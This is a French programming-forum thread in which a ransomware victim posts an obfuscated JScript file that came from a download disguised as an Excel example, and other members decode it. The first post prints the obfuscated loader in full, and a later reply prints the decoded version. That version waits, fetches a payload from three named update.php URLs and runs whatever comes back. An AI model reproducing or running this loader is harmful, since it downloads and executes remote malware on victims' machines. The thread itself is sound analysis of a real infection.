Explication sur code qui lance potentiellement un virus

**minus87** · 14/06/2019, 00h50

Bonjour tout le monde,

Récemment j'ai choppé un virus qui m'a crypté mes données.
J'ai un fichier que j'avais DL qui est devenu mon suspect n°1.
Je ne suis pas sur mais bon je laisse les pro du JS à me traduire ce code qui me parait tout de même louche, j'ai l'impression que ça noye le poisson.
En gros peut-on simplifier ce code en quelques lignes afin de voir vraiment ce qu'il fait.
A la base tout ce texte était écrit sur quelques lignes sans saut de lignes, j'ai essayé de faire un saut de ligne après chaque ";", j'en ai peut etre loupé un.

Merci par avance.
Je vous souhaite une bonne soirée.

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
 
OL=["y","-","H","!","O",";",":","3"];
dg=["c",",","m","{","S","f","x","a"];
lX=["D","}","=","e","s","T","0"," "];
zn=["o","t","M","w","\"","/","\\","'"];
bR=["h","i","q","C","L","N","u","z"];
IC=["X",")","E","l","j","+","W","("];
dO=["g","p","@","6","?","n","G","."];
fU=["1","b","v","r","P","I","d","F"];
aS=["7","2"];
Ix=WScript.Arguments.Length;
Uc=Ix+1;
bE=Uc+Uc;
Ca=bE+Uc;
Oc=Ca+Uc;
bm=Oc+Uc;
iA=bm+Uc;
dH=iA+Uc;
gr=dH+Uc;
Xb=gr+Uc;
function Fz(pl,lE){return lE=(pl);}iX=dg[Ix]+zn[Ix]+dO[bm];Fs=lX[Oc]+zn[Uc]+fU[Ca];
Qv=bR[iA]+dg[Ix]+zn[Uc];
rV=zn[Ix]+fU[Ca];
wp=iX+Fs+Qv+rV;
Fz=Fz[Fz(wp)];
Ak=IC[iA]+dg[Oc]+dg[Ix];
ta=fU[Ca]+bR[Uc]+dO[Uc];
Kh=zn[Uc]+dO[dH]+lX[Oc];
Sj=IC[Ca]+lX[Ca]+lX[Ca];
pp=dO[Uc]+IC[dH]+fU[Ix];
Ga=aS[Ix]+lX[iA]+lX[iA];
CZ=lX[iA]+IC[Uc]+OL[bm];
sV=lX[dH]+dg[bm]+bR[iA];
GW=dO[bm]+dg[Ix]+zn[Uc];
cg=bR[Uc]+zn[Ix]+dO[bm];
pz=lX[dH]+dg[dH]+fU[Ca];
sG=IC[dH]+lX[bm]+bR[Ix];
BO=IC[Uc]+lX[dH]+dg[Ca];
kT=lX[dH]+IC[Ca]+zn[Uc];
hQ=lX[dH]+lX[bE]+lX[dH];
cB=IC[iA]+dg[Oc]+dg[Ix];
cD=fU[Ca]+bR[Uc]+dO[Uc];
MN=zn[Uc]+dO[dH]+bR[Ca];
pK=fU[Ca]+lX[Ca]+dg[dH];
VH=zn[Uc]+lX[Ca]+OL[Oc];
px=fU[Uc]+IC[Oc]+lX[Ca];
Ke=dg[Ix]+zn[Uc]+IC[dH];
LE=zn[dH]+zn[bE]+dg[Oc];
uE=IC[Ix]+zn[bE]+bR[Oc];
pr=aS[Uc]+dO[dH]+dg[Oc];
ko=lX[Ca]+fU[Ca]+fU[bE];
dZ=lX[Ca]+fU[Ca]+IC[Ix];
ut=zn[bE]+bR[Oc]+OL[bE];
mV=lX[bm]+lX[bm]+fU[Oc];
aR=zn[dH]+IC[Uc]+OL[bm];
OO=lX[dH]+bR[bm]+bR[bm];
sv=lX[dH]+lX[bE]+lX[dH];
vk=zn[bE]+dg[dH]+zn[Uc];
UJ=bR[Ix]+dO[dH]+fU[Ca];
EQ=dg[dH]+dO[bm]+fU[iA];
YR=zn[Ix]+dg[bE]+IC[dH];
vV=IC[Uc]+dO[dH]+zn[Uc];
xN=zn[Ix]+dg[Oc]+zn[Uc];
pv=fU[Ca]+bR[Uc]+dO[bm];
QL=dO[Ix]+IC[dH]+IC[Uc];
qC=dO[dH]+lX[Oc]+bR[iA];
NH=fU[Uc]+lX[Oc]+zn[Uc];
BL=fU[Ca]+IC[dH]+aS[Uc];
kB=dg[Uc]+fU[Ix]+lX[iA];
jd=lX[iA]+IC[Uc]+OL[bm];
cM=lX[dH]+zn[Uc]+fU[Ca];
HG=OL[Ix]+dg[Ca]+lX[dH];
pi=IC[Ca]+zn[Uc]+dO[dH];
YN=zn[Ix]+dO[Uc]+lX[Ca];
BB=dO[bm]+IC[dH]+zn[dH];
VZ=dO[iA]+IC[bE]+lX[bm];
dv=zn[dH]+dg[Uc]+lX[dH];
iM=lX[bm]+bR[Ix]+IC[bm];
vd=zn[Oc]+dO[Oc]+dg[Ix];
sC=bR[bE]+bR[bE]+lX[Ca];
DT=bR[Uc]+bR[iA]+dO[bm];
Rb=dg[bm]+dg[iA]+IC[Ca];
md=zn[Uc]+dO[Uc]+fU[iA];
mJ=dg[bm]+lX[bE]+zn[Oc];
NZ=IC[bm]+bR[bm]+bR[bm];
Pi=dg[Uc]+lX[dH]+dg[bm];
Se=dg[dH]+IC[Ca]+lX[Oc];
Wl=lX[Ca]+IC[Uc]+OL[bm];
IR=lX[dH]+IC[Ca]+zn[Uc];
MB=dO[dH]+lX[Oc]+lX[Ca];
Ao=dO[bm]+fU[iA]+IC[dH];
gg=IC[Uc]+OL[bm]+lX[dH];
Ju=lX[Uc]+dg[Ix]+dg[dH];
bM=zn[Uc]+dg[Ix]+bR[Ix];
ls=IC[dH]+lX[Ca]+IC[Uc];
iO=dg[Ca]+lX[dH]+fU[Ca];
Yq=lX[Ca]+zn[Uc]+bR[iA];
ax=fU[Ca]+dO[bm]+lX[dH];
HK=dg[bm]+dg[dH]+IC[Ca];
TV=lX[Oc]+lX[Ca]+OL[bm];
ws=lX[dH]+lX[Uc]+lX[dH];
gV=bR[Uc]+dg[bm]+lX[dH];
Hw=IC[dH]+IC[Ca]+zn[Uc];
Dh=dO[dH]+lX[Oc]+zn[Uc];
mo=dg[dH]+zn[Uc]+bR[iA];
ij=lX[Oc]+lX[dH]+lX[bE];
uA=lX[bE]+lX[bE]+lX[dH];
bX=aS[Uc]+lX[iA]+lX[iA];
FP=IC[Uc]+lX[dH]+dg[Ca];
qD=lX[dH]+fU[bE]+dg[dH];
VI=fU[Ca]+lX[dH]+zn[Ca];
YW=zn[Uc]+lX[dH]+lX[bE];
hc=lX[dH]+IC[Ca]+zn[Uc];
Ej=dO[dH]+fU[Ca]+lX[Ca];
gJ=lX[Oc]+dO[Uc]+zn[Ix];
OH=dO[bm]+lX[Oc]+lX[Ca];
Uq=lX[bm]+lX[Ca]+dg[iA];
ao=zn[Uc]+OL[bm]+lX[dH];
Fw=bR[Uc]+dg[bm]+lX[dH];
dn=IC[dH]+IC[dH]+zn[Ca];
TE=zn[Uc]+dO[dH]+bR[Uc];
CC=dO[bm]+fU[iA]+lX[Ca];
xR=dg[iA]+OL[Oc]+dg[bm];
RF=IC[dH]+zn[Oc]+dO[bE];
BU=zn[Oc]+IC[bm]+bR[bm];
CV=bR[bm]+IC[bm]+zn[Oc];
wf=dO[bE]+zn[Oc]+dg[Uc];
Ln=lX[dH]+lX[iA]+IC[Uc];
HW=IC[Uc]+lX[bE]+lX[bE];
Kz=OL[Uc]+fU[Ix]+IC[Uc];
Xf=lX[dH]+dg[Ca]+lX[dH];
gY=fU[Ca]+lX[Ca]+zn[Uc];
IG=bR[iA]+fU[Ca]+dO[bm];
Tc=lX[dH]+dg[bm]+dg[dH];
Lb=IC[Ca]+lX[Oc]+lX[Ca];
jO=OL[bm]+lX[dH]+lX[Uc];
bo=lX[dH]+lX[Ca]+IC[Ca];
Il=lX[Oc]+lX[Ca]+lX[dH];
Vv=dg[Ca]+lX[dH]+zn[Ca];
pm=zn[Uc]+lX[dH]+lX[bE];
nW=lX[dH]+zn[Ca]+zn[Uc];
OR=dO[dH]+fU[Ca]+lX[Ca];
UF=dO[Uc]+IC[Ca]+dg[dH];
gU=dg[Ix]+lX[Ca]+IC[dH];
cm=zn[Oc]+dO[bE]+zn[Oc];
YG=IC[bm]+bR[bm]+bR[bm];
oh=IC[bm]+zn[Oc]+dO[bE];
yX=zn[Oc]+dg[Uc]+zn[Oc];
eK=zn[Oc]+IC[Uc]+OL[bm];
GZ=lX[dH]+fU[bE]+dg[dH];
Dy=fU[Ca]+lX[dH]+lX[Ix];
cZ=bR[dH]+lX[dH]+lX[bE];
LJ=lX[dH]+zn[Ca]+zn[Uc];
ww=dO[dH]+fU[Ca]+lX[Ca];
CQ=dO[Uc]+IC[Ca]+dg[dH];
es=dg[Ix]+lX[Ca]+IC[dH];
oK=zn[bm]+IC[dH]+zn[iA];
yh=fU[iA]+dg[Ca]+aS[Uc];
tR=lX[Uc]+IC[Uc]+zn[bm];
Gx=dO[Ix]+dg[Uc]+lX[dH];
EB=dg[bm]+bR[iA]+dO[bm];
cp=dg[Ix]+zn[Uc]+bR[Uc];
Hu=zn[Ix]+dO[bm]+lX[dH];
uj=IC[dH]+dg[iA]+bR[Oc];
xb=IC[Uc]+lX[dH]+dg[Ca];
Kx=lX[dH]+fU[Ca]+lX[Ca];
pn=zn[Uc]+bR[iA]+fU[Ca];
ZK=dO[bm]+lX[dH]+dg[Oc];
SA=zn[Uc]+fU[Ca]+bR[Uc];
se=dO[bm]+dO[Ix]+dO[dH];
hn=dg[bm]+fU[Ca]+zn[Ix];
AL=dg[bE]+bR[Ca]+bR[Ix];
qM=dg[dH]+fU[Ca]+bR[Ca];
ZI=zn[Ix]+fU[iA]+lX[Ca];
wq=IC[dH]+dO[Uc]+dg[dH];
WS=fU[Ca]+lX[Oc]+lX[Ca];
lD=fU[bm]+dO[bm]+zn[Uc];
Vf=IC[dH]+dg[iA]+bR[Oc];
eY=dg[Uc]+fU[Ix]+lX[iA];
ly=IC[Uc]+IC[bm]+OL[dH];
xn=lX[iA]+IC[Uc]+OL[bm];
Gf=lX[dH]+lX[Uc]+IC[Uc];
TB=OL[bm]+lX[dH]+fU[dH];
UO=bR[dH]+IC[dH]+lX[Ix];
EM=bR[dH]+IC[Uc]+IC[dH];
Kt=IC[Uc]+OL[bm]+lX[dH];
mU=fU[Ca]+lX[Ca]+zn[Uc];
ra=bR[iA]+fU[Ca]+dO[bm];
sk=lX[dH]+zn[Uc]+fU[Ca];
Ay=bR[iA]+lX[Ca]+OL[bm];
It=lX[dH]+lX[Uc]+lX[dH];
Ss=lX[Uc]+lX[dH]+lX[Ca];
Ai=IC[Ca]+lX[Oc]+lX[Ca];
XL=lX[dH]+dg[Ca]+lX[dH];
hu=fU[Ca]+lX[Ca]+zn[Uc];
Ew=bR[iA]+fU[Ca]+dO[bm];
zq=lX[dH]+dg[bm]+dg[dH];
Fv=IC[Ca]+lX[Oc]+lX[Ca];
jT=OL[bm]+lX[dH]+lX[Uc];
Km=lX[dH]+lX[Uc]+lX[dH];
VF=bR[Uc]+dg[bm]+lX[dH];
GL=IC[dH]+OL[Ca]+lX[dH];
En=dg[dH]+fU[Ca]+IC[dH];
Pv=zn[dH]+bR[Ix]+zn[Uc];
BH=zn[Uc]+dO[Uc]+OL[iA];
LG=zn[bm]+zn[bm]+zn[Ca];
Fp=bR[Uc]+dg[bE]+dg[dH];
Za=fU[Ca]+IC[Oc]+dg[dH];
Tz=lX[Ca]+dO[Ix]+lX[Ca];
uK=fU[Ca]+dO[dH]+dO[bm];
ky=IC[Ca]+zn[bm]+bR[iA];
tP=dO[Uc]+fU[iA]+dg[dH];
Bi=zn[Uc]+lX[Ca]+dO[dH];
QT=dO[Uc]+bR[Ix]+dO[Uc];
Qh=zn[dH]+IC[Uc]+IC[Uc];
ym=lX[dH]+dg[Ca]+lX[dH];
Ou=IC[iA]+dg[Oc]+dg[Ix];
kg=fU[Ca]+bR[Uc]+dO[Uc];
Ah=zn[Uc]+dO[dH]+lX[Oc];
mA=IC[Ca]+lX[Ca]+lX[Ca];
Eg=dO[Uc]+IC[dH]+OL[dH];
yZ=lX[iA]+lX[iA]+lX[iA];
qy=lX[iA]+IC[Uc]+OL[bm];
EC=lX[dH]+bR[Uc]+dg[bm];
BY=lX[dH]+IC[dH]+OL[Ca];
PQ=lX[dH]+dg[dH]+fU[Ca];
it=IC[dH]+zn[dH]+bR[Ix];
fK=zn[Uc]+zn[Uc]+dO[Uc];
Mc=OL[iA]+zn[bm]+zn[bm];
um=zn[Ca]+zn[Ca]+zn[Ca];
ux=dO[dH]+lX[Ca]+IC[Ca];
OT=bR[Uc]+lX[Oc]+dg[dH];
ai=fU[iA]+lX[Ca]+fU[bE];
pd=dg[dH]+IC[Ca]+dO[dH];
Iu=dg[Ix]+zn[Ix]+dg[bE];
YJ=zn[bm]+bR[iA]+dO[Uc];
KN=fU[iA]+dg[dH]+zn[Uc];
JP=lX[Ca]+dO[dH]+dO[Uc];
QC=bR[Ix]+dO[Uc]+zn[dH];
Yu=IC[Uc]+IC[Uc]+lX[dH];
qH=dg[Ca]+lX[dH]+IC[iA];
Hr=dg[Oc]+dg[Ix]+fU[Ca];
Dj=bR[Uc]+dO[Uc]+zn[Uc];
ks=dO[dH]+lX[Oc]+IC[Ca];
WG=lX[Ca]+lX[Ca]+dO[Uc];
Sb=IC[dH]+dO[Ca]+lX[iA];
RM=lX[iA]+lX[iA]+lX[iA];
Bp=IC[Uc]+OL[bm]+lX[dH];
Hq=dg[dH]+fU[Ca]+IC[dH];
WE=zn[dH]+bR[Ix]+zn[Uc];
Wd=zn[Uc]+dO[Uc]+OL[iA];
mk=zn[bm]+zn[bm]+zn[Ca];
Lo=zn[Ca]+zn[Ca]+dO[dH];
Vq=bR[bE]+bR[iA]+bR[Uc];
MY=dO[bm]+dO[bm]+lX[Ca];
QW=IC[Ca]+dO[dH]+dg[Ix];
Gj=zn[Ix]+dg[bE]+zn[bm];
lr=bR[iA]+dO[Uc]+fU[iA];
ri=dg[dH]+zn[Uc]+lX[Ca];
mn=dO[dH]+dO[Uc]+bR[Ix];
tp=dO[Uc]+zn[dH]+IC[Uc];
pT=OL[bm]+lX[dH]+lX[Uc];
tu=lX[dH]+lX[Uc];
NR=Ak+ta;
Mn=NR+Kh+Sj+pp;
RL=Mn+Ga+CZ;
cO=RL+sV+GW;
ll=cO+cg+pz;
fa=ll+sG+BO;
tM=fa+kT+hQ+cB;
wU=tM+cD+MN;
sd=wU+pK+VH+px+Ke+LE;
Jd=sd+uE+pr+ko+dZ+ut;
hA=Jd+mV+aR+OO+sv+vk;
uH=hA+UJ+EQ;
ET=uH+YR+vV+xN;
xo=ET+pv+QL+qC+NH+BL;
Jm=xo+kB+jd+cM;
xJ=Jm+HG+pi;
Jj=xJ+YN+BB+VZ+dv;
TG=Jj+iM+vd;
lg=TG+sC+DT+Rb+md;
uc=lg+mJ+NZ+Pi+Se+Wl;
To=uc+IR+MB+Ao+gg;
sl=To+Ju+bM+ls;
Xk=sl+iO+Yq+ax+HK;
RS=Xk+TV+ws+gV+Hw+Dh;
Fe=RS+mo+ij+uA+bX;
yT=Fe+FP+qD+VI;
sI=yT+YW+hc;
PK=sI+Ej+gJ+OH+Uq;
cf=PK+ao+Fw+dn;
xz=cf+TE+CC+xR;
jU=xz+RF+BU+CV;
Fg=jU+wf+Ln+HW;
mF=Fg+Kz+Xf+gY+IG+Tc;
NK=mF+Lb+jO+bo+Il;
pP=NK+Vv+pm+nW+OR;
Ps=pP+UF+gU;
Ie=Ps+cm+YG+oh+yX;
Yk=Ie+eK+GZ+Dy+cZ+LJ;
jS=Yk+ww+CQ;
zj=jS+es+oK+yh+tR;
kZ=zj+Gx+EB+cp+Hu;
Do=kZ+uj+xb+Kx+pn+ZK;
Zf=Do+SA+se+hn+AL;
BW=Zf+qM+ZI;
iu=BW+wq+WS+lD+Vf;
sA=iu+eY+ly;
KB=sA+xn+Gf;
FD=KB+TB+UO+EM;
MC=FD+Kt+mU;
aU=MC+ra+sk+Ay+It+Ss;
kA=aU+Ai+XL;
Np=kA+hu+Ew+zq+Fv+jT;
Nk=Np+Km+VF;
TI=Nk+GL+En+Pv+BH+LG;
tT=TI+Fp+Za+Tz+uK;
zX=tT+ky+tP+Bi+QT+Qh;
Pa=zX+ym+Ou+kg;
Tp=Pa+Ah+mA+Eg+yZ;
hw=Tp+qy+EC+BY+PQ;
KD=hw+it+fK+Mc+um+ux;
Xg=KD+OT+ai;
aI=Xg+pd+Iu;
Qj=aI+YJ+KN+JP;
vR=Qj+QC+Yu+qH+Hr+Dj;
qO=vR+ks+WG+Sb+RM;
eZ=qO+Bp+Hq+WE+Wd+mk;
aE=eZ+Lo+Vq;
TJ=aE+MY+QW+Gj;
DK=TJ+lr+ri+mn+tp;
by=DK+pT+tu;
Bo=by;
Fz(Bo)(Fz('')(470117));

**minus87** · 14/06/2019, 04h06

J'ai l'impression qu'il y a du Visual Basic Script également.

**eleydet** · 14/06/2019, 09h01

Bonjour,

Je ne connaissais pas cette manière de chiffrer du code. La ligne
Ix=WScript.Arguments.Length;
montre qu'il existe une fonction WScript, mais elle n'est évoquée qu'une seule fois. A mon avis, il manque quelques lignes de code pour retrouver le code original.

Sinon on évite :

la perte des données en effectuant des sauvegardes sur divers supports
les virus en utilisant un système d'exploitation fiable, un système GNU/Linux par exemple.

**Doksuri** · 14/06/2019, 09h05

en effet, si tu google "WScript.Arguments.Length", tu tombes sur du VB.
les premiers tableaux ne sont rien d'autre que l'alphabet et certains caracteres (){}\/... melanges
il faudrait comprendre ce que retourne WScript.Arguments.Length (qui semble etre une longueure... mais je ne connais pas le VB)

si tu connais Ix dans la ligne Ix=WScript.Arguments.Length;
tu peux decoder tout le reste, vu que c'est une grosse concatenation...
il va piocher dans l'alphabet (mais avec un decallage de Ix)

**minus87** · 14/06/2019, 13h10

J'ai essayé d'analysé le code avec mes peu de connaissance et google.

En effet, j'en ai conclu la même chose, WScript.Arguments.Length est la clé pour pouvoir réécrire le code.
La question est que vaut cette valoir.
J'ai cherché sur le net ce bout de code, qui représente le nombre d'argument donné lors du lancement du script.
C'est un peu flou....
J'ignore si j'ai bien compris.
La question est comment connaitre sa valeur.

++

**Watilin** · 14/06/2019, 20h02

S’il s’agit d’un script lancé depuis un shell, on peut tenter le coup de chance et supposer qu’il est appelé avec zéro argument. Ainsi, Arguments.Length sera probablement 0. Ou alors 1 si le système considère le nom du programme comme premier argument.

J’ai essayé d’interpréter le code comme du JS en l’initialisant avec ceci :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
WScript = {
  Arguments: {
    Length: 0
  }
};

Ensuite, en regardant la dernière ligne, je me suis dit que Fz devait avoir un rôle important, et en l’examinant j’ai pu voir qu’il était égal au constructeur Function.
Ainsi, Fz('') est une fonction qui ne fait rien, et Fz('')(470117) est une façon inutilement compliquée d’obtenir la valeur de retour d’une fonction qui ne renvoie rien, autrement dit undefined.

Mais le plus important est la variable Bo qui est passée à Function et qui contient la partie intéressante du code.

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
WScript.sleep(17000);
function ar(Th) {
  lt = WScript.CreateObject('MSXML2.ServerXMLHTTP');
  NN = Math.random().toString().substr(2,100);
  try {
    lt.open('GET', Th+"?cqqeiunfxltpdf="+NN, false);
    lt.send();
  }
  catch (e) {
    return false;
  }
 
  if (lt.status === 200) {
    var wt = lt.responseText;
    if ((wt.indexOf("@"+NN+"@", 0))==-1) {
      return false;
    }
    else {
      wt = wt.replace("@"+NN+"@","");
      var Dz = wt.replace(/(\\d{2})/g, function (xL) {
        return String.fromCharCode(parseInt(xL,10)+30);
      });
      Fz(Dz)();
      return true;
    }
  }
  else {
    return false;
  }
}
 
if (!ar('http://wimarjaeger.nl/update.php')) {
  WScript.sleep(30000);
  if (!ar('http://www.elisadeval.com/update.php')) {
    WScript.sleep(60000);
    ar('http://www.quinnel.com/update.php');
  }
}

On a un truc qui ressemble beaucoup à une requête ajax, avec un objet 'MSXML2.XMLHTTP'. Je pense que le script est conçu pour être exécuté dans Internet Explorer.
Plus bas on voit trois requêtes vers 3 domaines différents, essayés l’un après l’autre après une pause (sleep) si le précédent n’est pas joignable.

En imitant la requête envoyée par le script, à chacun de ces domaines, on reçoit une réponse vide. J’imagine que le serveur attend des en-têtes particuliers pour envoyer le vrai payload, peut-être un cookie de session établi avec une requête précédente. En l’état, on n’a pas assez d’informations.
Une chose est sûre : ce script n’est qu’un simple loader, il ne contient pas le principal code malicieux.

**minus87** · 14/06/2019, 20h56

Hello Watilin,

Pour commencer, je précise que je n'ai aucun autre fichier qui va avec.
Ce document je l'ai téléchargé à cet emplacement
http://www.sconnect.net/exemple-bila...uissance-xls/#

Par contre un truc bizarre, la page n'est plus du tout la même qu'hier....
Hier c'était comme un post de forum avec 4/5 messages dont un qui contenait un fichier .zip à télécharger qui se nommait "exemple_bilan_de_puissance_xls.zip"
Celui-ci contenait le fichier js "exemple_bilan_de_puissance_xls.js"

Aujourd'hui la page a changé.... Ma suspicion augment encore....
J'ai encore le document compressé si ça intéresse du monde.

J'ai bien lu que WScript.Arguments.Length était le nombre de paramètre lors du lancement du script.
J'ignore totalement qui fait le lancement et avec quels paramètres, par conséquent je me suis demandé si "Length" ne prenait pas la valeur de 0 si ce script était lancé en double cliquant dessus directement.

Concernant ta réponse, je t'avoue ne pas tout comprendre, je reste limité dans le codage.
Dois-je comprendre que le code que tu as écrit correspond en gros à la traduction de son code en prenant 0 comme valeur pour lenght ?
Si c'est le cas je dirai que tu as vu juste étant donné que l'on a des mots comme "http", si la valeur de lenght n'était pas 0 j'imagine que la probabilité de tombé sur http serait faible voir impossible.

Tu entends quoi par un "simple loader" ?
Serait-il capable d'aller télécharger un virus sur un serveur et de l'exécuter ?
Penses-tu que l'on peut creuser le sujet un peu plus pour avoir des réponses ?

++

Explication sur code qui lance potentiellement un virus

JavaScript

Vue hybride

Discussions similaires

Partager

Partager